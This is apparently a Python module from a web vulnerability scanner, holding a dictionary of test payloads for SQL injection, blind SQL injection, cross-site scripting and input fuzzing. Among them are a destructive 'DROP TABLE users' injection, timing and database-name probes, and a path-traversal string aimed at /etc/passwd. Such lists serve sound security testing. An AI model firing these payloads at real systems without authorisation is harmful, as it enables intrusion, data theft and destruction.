PAYLOADS = {
	"sqli": [
		"' OR '1'='1",
		"' OR '1'='1'--",
		"' OR '1'='1'/*",
		"admin'--",
		"admin' #",
		"1 UNION SELECT null--",
		"1 UNION SELECT null,null--",
		"1 UNION SELECT null,null,null--",
		"' AND 1=0 UNION SELECT null,null--",
		"1; DROP TABLE users--",
		"1 OR 1=1",
		"' OR 'x'='x",
		"') OR ('x'='x",
	],
	"blind_sqli": [
		"1' AND 1=1--",
		"1' AND 1=2--",
		"1' AND SUBSTRING((SELECT database()),1,1)='a'--",
		"1' AND SUBSTRING((SELECT database()),1,1)='b'--",
		"1' AND LENGTH(database())>1--",
		"1' AND LENGTH(database())>5--",
		"1' AND LENGTH(database())>10--",
		"1 AND SLEEP(5)--",
		"1'; WAITFOR DELAY '0:0:5'--",
	],
	"xss": [
		"<script>alert(1)</script>",
		"<img src=x onerror=alert(1)>",
		'"><script>alert(1)</script>',
		"<svg onload=alert(1)>",
		"javascript:alert(1)",
		"<body onload=alert(1)>",
		"'-alert(1)-'",
		'"-alert(1)-"',
		"<iframe src=javascript:alert(1)>",
		"<%2Fscript><script>alert(1)<%2Fscript>",
	],
	"fuzzing": [
		"'",
		'"',
		'<',
		'>',
		'&',
		';',
		'|',
		'`',
		'../',
		'../../etc/passwd',
		'%00',
		'null',
		'undefined',
		'${7*7}',
		'{{7*7}}',
		'a' * 1000,
		'%' * 100,
	],
}

def get_payloads(attack_type: str) -> list:
	return PAYLOADS.get(attack_type, PAYLOADS["fuzzing"])